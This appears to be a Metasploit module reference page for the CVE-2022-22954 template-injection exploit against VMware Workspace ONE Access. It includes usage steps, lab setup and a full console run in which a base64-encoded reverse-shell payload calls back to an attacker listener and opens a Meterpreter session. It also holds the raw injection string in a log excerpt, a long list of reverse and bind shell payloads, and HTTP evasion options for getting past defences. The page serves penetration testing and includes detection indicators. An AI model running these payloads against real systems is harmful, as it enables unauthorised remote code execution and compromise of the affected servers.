VMware Workspace ONE Access CVE-2022-22954 - Metasploit


This page contains detailed information about how to use the exploit/linux/http/vmware_workspace_one_access_cve_2022_22954 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: VMware Workspace ONE Access CVE-2022-22954
Module: exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
Source code: modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb
Disclosure date: 2022-04-06
Last modification time: 2022-05-03 11:47:31 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-22954

This module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the "horizon" user.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
msf exploit(vmware_workspace_one_access_cve_2022_22954) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Setup

Follow Installing and Configuring VMware Workspace ONE Access or simply import the OVA into a VMware hypervisor. The target should be exploitable out of the box.

  1. Import identity-manager-21.08.0.1-19010796_OVF10.ova
  2. Boot the VM
  3. Hax

Verification Steps


Follow Setup and Scenarios.

Scenarios


VMware Workspace ONE Access 21.08.0.1

msf6 > use exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > options

Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set rhosts 192.168.0.5
rhosts => 192.168.0.5
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set reverselistenerbindaddress 127.0.0.1
reverselistenerbindaddress => 127.0.0.1
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbose true
verbose => true
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run

[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing command: bash -c {eval,$({echo,ZWNobyBWR3h3NHNpeFMyeElx}|{base64,-d})}
[+] The target is vulnerable.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Executing command: bash -c {eval,$({echo,ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ2Jhc2U2NFwnXCkuYjY0ZGVjb2RlXChfX2ltcG9ydF9fXChcJ2NvZGVjc1wnXCkuZ2V0ZW5jb2RlclwoXCd1dGYtOFwnXClcKFwnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFNU1pNHhOamd1TUM0MEp5dzBORFEwS1NrS0NRbGljbVZoYXdvSlpYaGpaWEIwT2dvSkNYUnBiV1V1YzJ4bFpYQW9OU2tLYkQxemRISjFZM1F1ZFc1d1lXTnJLQ2MrU1Njc2N5NXlaV04yS0RRcEtWc3dYUXBrUFhNdWNtVmpkaWhzS1FwM2FHbHNaU0JzWlc0b1pDazhiRG9LQ1dRclBYTXVjbVZqZGloc0xXeGxiaWhrS1NrS1pYaGxZeWg2YkdsaUxtUmxZMjl0Y0hKbGMzTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTaGtLU2tzZXlkekp6cHpmU2tLXCdcKVxbMFxdXClcKSB8IGV4ZWMgJCh3aGljaCBweXRob24gfHwgd2hpY2ggcHl0aG9uMyB8fCB3aGljaCBweXRob24yKSAt}|{base64,-d})}
[*] Sending stage (40060 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:59441) at 2022-05-03 11:50:00 -0500

meterpreter > getuid
Server username: horizon
meterpreter > sysinfo
Computer        : photon-machine
OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >

IOCs


/opt/vmware/horizon/workspace/logs/greenbox_web.log

[snip]
2022-05-03 16:49:58,796 WARN (Thread-289) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] <GreenBox> <correlation_id: e7eb8ce2-9bba-4526-8720-208d93e8913b> <tenant_id: 6g79dnjuixnnsar> <client_ip: 192.168.0.2> <username: > <device_id: > - Additional error info for requestId e7eb8ce2-9bba-4526-8720-208d93e8913b which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. Login request  received with tenant code: 6g79dnjuixnnsar, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ2Jhc2U2NFwnXCkuYjY0ZGVjb2RlXChfX2ltcG9ydF9fXChcJ2NvZGVjc1wnXCkuZ2V0ZW5jb2RlclwoXCd1dGYtOFwnXClcKFwnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFNU1pNHhOamd1TUM0MEp5dzBORFEwS1NrS0NRbGljbVZoYXdvSlpYaGpaWEIwT2dvSkNYUnBiV1V1YzJ4bFpYQW9OU2tLYkQxemRISjFZM1F1ZFc1d1lXTnJLQ2MrU1Njc2N5NXlaV04yS0RRcEtWc3dYUXBrUFhNdWNtVmpkaWhzS1FwM2FHbHNaU0JzWlc0b1pDazhiRG9LQ1dRclBYTXVjbVZqZGloc0xXeGxiaWhrS1NrS1pYaGxZeWg2YkdsaUxtUmxZMjl0Y0hKbGMzTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTaGtLU2tzZXlkekp6cHpmU2tLXCdcKVxbMFxdXClcKSB8IGV4ZWMgJCh3aGljaCBweXRob24gfHwgd2hpY2ggcHl0aG9uMyB8fCB3aGljaCBweXRob24yKSAt}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException
[snip]

Go back to menu.

Msfconsole Usage


Here is how the linux/http/vmware_workspace_one_access_cve_2022_22954 exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/vmware_workspace_one_access_cve_2022_22954

[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show info

       Name: VMware Workspace ONE Access CVE-2022-22954
     Module: exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-04-06

Provided by:
  mr_me
  Udhaya Prakash
  wvu <[email protected]>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                        listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module exploits CVE-2022-22954, an unauthenticated server-side 
  template injection (SSTI) in VMware Workspace ONE Access, to execute 
  shell commands as the "horizon" user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-22954
  https://www.vmware.com/security/advisories/VMSA-2022-0011.html
  https://srcincite.io/advisories/src-2022-0005/
  https://github.com/sherlocksecurity/VMware-CVE-2022-22954
  https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis

Module Options


This is a complete list of options available in the linux/http/vmware_workspace_one_access_cve_2022_22954 exploit:

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options

Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                          listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command

Advanced Options


Here is a complete list of advanced options supported by the linux/http/vmware_workspace_one_access_cve_2022_22954 exploit:

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show advanced

Module advanced options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):

   Name                    Current Setting                          Required  Description
   ----                    ---------------                          --------  -----------
   AutoCheck               true                                     no        Run check before exploit
   CMDSTAGER::DECODER                                               no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                     no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write,
                                                                               echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwpre
                                                                              quest, psh_invokewebrequest)
   CMDSTAGER::SSL          false                                    no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                  no        Writable directory for staged files
   CmdExecTimeout          3.5                                      yes       Command execution timeout
   ContextInformationFile                                           no        The information file that contains context information
   DOMAIN                  WORKSTATION                              yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                     no        Conform to IIS, should work for most servers. Only set to false for non
                                                                              -IIS servers
   DisablePayloadHandler   false                                    no        Disable the handler code for the selected payload
   EXE::Custom                                                      no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                    no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                    no        Use the default template in case the specified one is missing
   EXE::Inject             false                                    no        Set to preserve the original EXE function
   EXE::OldMethod          false                                    no        Set to use the substitution EXE generation method.
   EXE::Path                                                        no        The directory in which to look for the executable template
   EXE::Template                                                    no        The executable template file name.
   EnableContextEncoding   false                                    no        Use transient context when encoding payloads
   FingerprintCheck        true                                     no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                    no        Override check result
   HttpClientTimeout                                                no        HTTP connection and receive timeout
   HttpPassword                                                     no        The HTTP password to specify for authentication
   HttpRawHeaders                                                   no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                    no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                  no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                    no        Show HTTP headers only in HttpTrace
   HttpUsername                                                     no        The HTTP username to specify for authentication
   ListenerBindAddress                                              no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                 no        The port to bind to if different from SRVPORT
   ListenerComm                                                     no        The specific communication channel to use for this service
   MSI::Custom                                                      no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                    no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                        no        The directory in which to look for the msi template
   MSI::Template                                                    no        The msi template file name
   MSI::UAC                false                                    no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                    no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                     yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto
                                                                              -negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                    no        Return a robots.txt file if asked for one
   URIHOST                                                          no        Host to use in URI (useful for tunnels)
   URIPORT                                                          no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/5.0 (Macintosh; Intel Mac OS X   no        The User-Agent header to use for all requests
                           12.2; rv:97.0) Gecko/20100101 Firefox/9
                           7.0
   VERBOSE                 false                                    no        Enable detailed status messages
   WORKSPACE                                                        no        Specify the workspace for this module
   WfsDelay                2                                        no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Enable debugging for the Python meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-fram
                                                           ework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but
                                                           directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/vmware_workspace_one_access_cve_2022_22954 module can exploit:

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/vmware_workspace_one_access_cve_2022_22954 exploit:

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show payloads

Compatible Payloads
===================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                              normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                                  normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                              normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                              normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                           normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                                    normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                               normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                           normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                             normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                                normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                             normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                                        normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                             normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                              normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                               normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                                         normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                                      normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/python/meterpreter/bind_tcp                           normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
   20  payload/cmd/unix/python/meterpreter/bind_tcp_uuid                      normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   21  payload/cmd/unix/python/meterpreter/reverse_http                       normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   22  payload/cmd/unix/python/meterpreter/reverse_https                      normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   23  payload/cmd/unix/python/meterpreter/reverse_tcp                        normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   24  payload/cmd/unix/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   25  payload/cmd/unix/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   26  payload/cmd/unix/python/meterpreter_bind_tcp                           normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   27  payload/cmd/unix/python/meterpreter_reverse_http                       normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   28  payload/cmd/unix/python/meterpreter_reverse_https                      normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   29  payload/cmd/unix/python/meterpreter_reverse_tcp                        normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   30  payload/cmd/unix/python/pingback_bind_tcp                              normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   31  payload/cmd/unix/python/pingback_reverse_tcp                           normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   32  payload/cmd/unix/python/shell_bind_tcp                                 normal  No     Python Exec, Command Shell, Bind TCP (via python)
   33  payload/cmd/unix/python/shell_reverse_tcp                              normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   34  payload/cmd/unix/python/shell_reverse_tcp_ssl                          normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   35  payload/cmd/unix/python/shell_reverse_udp                              normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   36  payload/cmd/unix/reverse                                               normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   37  payload/cmd/unix/reverse_awk                                           normal  No     Unix Command Shell, Reverse TCP (via AWK)
   38  payload/cmd/unix/reverse_bash                                          normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   39  payload/cmd/unix/reverse_bash_telnet_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   40  payload/cmd/unix/reverse_bash_udp                                      normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   41  payload/cmd/unix/reverse_jjs                                           normal  No     Unix Command Shell, Reverse TCP (via jjs)
   42  payload/cmd/unix/reverse_ksh                                           normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   43  payload/cmd/unix/reverse_lua                                           normal  No     Unix Command Shell, Reverse TCP (via Lua)
   44  payload/cmd/unix/reverse_ncat_ssl                                      normal  No     Unix Command Shell, Reverse TCP (via ncat)
   45  payload/cmd/unix/reverse_netcat                                        normal  No     Unix Command Shell, Reverse TCP (via netcat)
   46  payload/cmd/unix/reverse_netcat_gaping                                 normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   47  payload/cmd/unix/reverse_nodejs                                        normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   48  payload/cmd/unix/reverse_openssl                                       normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   49  payload/cmd/unix/reverse_perl                                          normal  No     Unix Command Shell, Reverse TCP (via Perl)
   50  payload/cmd/unix/reverse_perl_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   51  payload/cmd/unix/reverse_php_ssl                                       normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   52  payload/cmd/unix/reverse_python                                        normal  No     Unix Command Shell, Reverse TCP (via Python)
   53  payload/cmd/unix/reverse_python_ssl                                    normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   54  payload/cmd/unix/reverse_r                                             normal  No     Unix Command Shell, Reverse TCP (via R)
   55  payload/cmd/unix/reverse_ruby                                          normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   56  payload/cmd/unix/reverse_ruby_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   57  payload/cmd/unix/reverse_socat_udp                                     normal  No     Unix Command Shell, Reverse UDP (via socat)
   58  payload/cmd/unix/reverse_ssh                                           normal  No     Unix Command Shell, Reverse TCP SSH
   59  payload/cmd/unix/reverse_ssl_double_telnet                             normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   60  payload/cmd/unix/reverse_stub                                          normal  No     Unix Command Shell, Reverse TCP (stub)
   61  payload/cmd/unix/reverse_tclsh                                         normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   62  payload/cmd/unix/reverse_zsh                                           normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   63  payload/generic/custom                                                 normal  No     Custom Payload
   64  payload/generic/shell_bind_tcp                                         normal  No     Generic Command Shell, Bind TCP Inline
   65  payload/generic/shell_reverse_tcp                                      normal  No     Generic Command Shell, Reverse TCP Inline
   66  payload/generic/ssh/interact                                           normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/vmware_workspace_one_access_cve_2022_22954 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-no
                                                            rmal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • mr_me
  • Udhaya Prakash
  • wvu

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.